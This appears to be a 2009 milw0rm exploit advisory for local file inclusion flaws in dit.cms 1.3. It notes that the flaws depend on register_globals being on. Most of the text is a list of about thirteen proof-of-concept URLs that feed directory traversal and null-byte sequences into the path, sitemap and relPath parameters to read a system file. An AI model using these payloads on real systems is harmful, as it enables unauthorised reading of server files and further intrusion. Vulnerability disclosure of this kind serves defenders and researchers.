########################################################################################################## [+] dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ########################################################################################################## [+] Homepage : http://ditcms.org/ [+] Local File Inclusion - Note : register_globals = on - Vulnerable code is everywhere - PoC's http://127.0.0.1/path/install/index.php?path=../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/left_rightslideopen/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/left_rightslideopen/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_pullout/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_pullout/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_slideopen/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_slideopen/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/simple/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/top_dropdown/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/top_dropdown/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/topside/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/topside/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/index/index.php?relPath=../../../../../../boot.ini%00 ########################################################################################################## # milw0rm.com [2009-07-30]